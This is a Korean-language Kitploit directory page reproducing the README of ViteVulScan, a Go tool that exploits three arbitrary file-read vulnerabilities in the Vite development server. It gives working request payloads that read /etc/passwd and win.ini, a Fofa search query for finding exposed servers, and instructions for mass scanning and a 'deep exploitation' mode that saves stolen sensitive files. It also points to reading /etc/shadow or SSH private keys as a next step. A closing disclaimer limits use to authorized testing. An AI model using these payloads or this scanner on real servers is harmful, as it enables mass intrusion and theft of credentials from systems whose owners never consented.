Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/jackieya/vitevulscan
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringFuzzing
GitHubjackieya/vitevulscan

ViteVulScan

CVE-2025-30208 및 CVE-2025-31125 취약점 익스플로잇

저장소 보기
71년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
ViteVulScan — CVE-2025-30208 및 CVE-2025-31125 취약점 익스플로잇 | Kitploit

ViteVulScan

취약점 소개

이 프로젝트는 3개의 취약점인 CVE-2025-30208/CVE-2025-31125/CVE-2025-31486을 다룹니다. 모두 Vite 개발 서버의 임의 파일 읽기 취약점으로, 적용 범위가 넓고 제한 없이 쉽게 악용할 수 있습니다.

취약점 POC:

CVE-2025-30208:

Windows: /@fs/C://Windows/win.ini?import&raw??

Linux: /@fs/etc/passwd?import&raw??

CVE-2025-31125

Windows: /@fs/C://windows/win.ini?import&?inline=1.wasm?init

Linux: /@fs/etc/passwd?import&?inline=1.wasm?init

CVE-2025-31486

Windows: /@fs/x/x/x/vite-project/?/../../../../../C://windows/win.ini?import&?inline=1.wasm?init

Linux: /@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?inline=1.wasm?init

경로에서 /@fs는 생략 가능합니다.

Fofa 검색 문법:

body="/@vite/client"

도구 사용 설명

도구 특징

  1. fofa와 연동하여 대량으로 활용할 수 있습니다.
  2. 취약점이 존재하는 정확한 경로를 분석하고 심층 활용합니다.
  3. go의 동시성 기능을 최대한 활용하여 단시간 내에 대량의 자산을 빠르게 일괄 탐지할 수 있습니다.

빌드 설명

go 버전: go 1.20 이상

프로젝트 루트 디렉터리로 이동합니다.

먼저 의존성을 동기화합니다.

go mod tidy

그런 다음 프로젝트를 빌드합니다.

go build -o ViteVulScan -ldflags="-s -w" -trimpath .

./ViteVulScan으로 스크립트를 실행할 수 있습니다.

물론 프로젝트 루트 디렉터리에서 직접 실행할 수도 있습니다:

go run .

설정

스크립트는 fofa와 연동하여 자산을 검색한 후 대량으로 탐지할 수 있습니다.

fofa를 사용하려면 app.ini 파일이 컴파일된 바이너리 파일과 같은 디렉터리에 있어야 하며, config 디렉터리 아래의 app.ini 파일을 수정해야 합니다. fofakey 필드에 자신의 fofakey를 입력하고, num은 대략 탐지할 자산 수를 예상하여 설정합니다.

이 취약점에 더 나은 fofa 검색 문법이 있다면 fofaQuery 필드를 직접 수정할 수 있습니다.

명령줄 매개변수 설명

Usage of ./ViteVulScan:

매개변수설명

설명

  1. 파일 내 모든 대상 URL을 일괄 탐지하려면 파일에 한 줄에 하나의 URL이 있도록 합니다. URL은 http를 포함한 전체 URL이거나 도메인 이름 또는 IP일 수 있습니다. 예:
    root@kitploit:~
      http://example1.com 
      example2.com
      127.0.0.1
    
  2. -fofa 또는 -f 매개변수를 지정하여 탐지하면 취약점이 있는 자산이 자동으로 현재 파일에 저장됩니다. 파일 이름 형식은 "현재 타임스탬프.csv"입니다.
  3. Linux 및 Windows 플랫폼 모두에서 활용을 지원하며, 활용 사전은 각각 dict 디렉터리의 linux_sensitive_path.txt 및 windows_sensitive_path.txt입니다. 더 많은 민감 경로가 있다면 해당 사전에 직접 추가할 수 있습니다.

예시

예시 1: fofa와 연동하여 대량 탐지:

./ViteVulScan -fofa

image-20250410145741383

스캔이 완료되면 result 디렉터리에 활용 성공한 URL의 csv 파일이 타임스탬프 이름으로 저장됩니다:

image-20250410151756704

예시 2: 취약점이 있는 URL에 대해 심층 활용:

./ViteVulScan -u example.com -e

image-20250410150341952

"활용 성공"이 표시되면 result 디렉터리를 확인하세요. 스캔한 URL 이름의 디렉터리가 생성되며, 스캔된 민감 파일의 내용이 원본 파일 형식으로 변환되어 해당 경로에 저장됩니다. 결과는 다음과 같습니다:

image-20250410150836985

저장된 result/localhost:5173/etc/passwd의 내용을 예로 들면, 민감 정보의 전체 내용이 저장되어 후속 활용이 가능합니다 (/etc/shadow 또는 서버의 SSH 개인 키를 읽을 수 있다면 추가로 활용할 수 있습니다).

image-20250410151044619

면책 조항

이 도구는 보안 연구 및 승인된 테스트 용도로만 사용하시기 바랍니다. 불법적인 용도로 사용하지 마십시오. 본 도구를 사용하여 승인되지 않은 테스트를 수행할 경우 발생하는 모든 결과는 사용자 본인에게 있습니다.

업데이트

3월 29일 최초 배포:

  • fofa를 통한 자산 수집 기능 구현
  • CVE_2025_30208 취약점을 사용한 일괄 검증 기능 구현
  • 명령줄 구문 분석 기능 추가

4월 1일:

  • 심층 활용 기능 구현

4월 2일:

  • 새로 나온 CVE_2025_31125 취약점 검증 추가

4월 9일:

  • fofa 모듈 오류 수정
  • 동시성 기능 추가, 빠른 대량 자산 취약점 탐지 지원
  • CVE_2025_31486 검증 추가
  • 프로젝트 파일 구조 수정
도구 다운로드
-cve어떤 CVE 취약점을 사용하여 탐지할지 선택합니다. CVE_2025_30208 / CVE_2025_31125 / CVE_2025_31486을 지원합니다. 기본값은 CVE_2025_30208입니다.
-fofa이 매개변수를 지정하면 fofa를 연동하여 자산을 검색하고 얻은 대상 자산을 일괄 탐지합니다.
-u | -url단일 URL 대상을 지정하여 탐지합니다.
-f | -filename파일 이름을 지정하여 해당 파일에 있는 URL 주소를 일괄 탐지합니다.
-e이 매개변수를 지정하면 취약점이 존재하는 자산에 대해 심층 활용을 수행하여 다양한 민감 파일을 읽고 로컬에 저장합니다. (이 기능은 신중하게 사용하십시오. 단일 대상 탐지, 즉 -u와 함께 이 매개변수를 사용하는 것이 좋습니다.)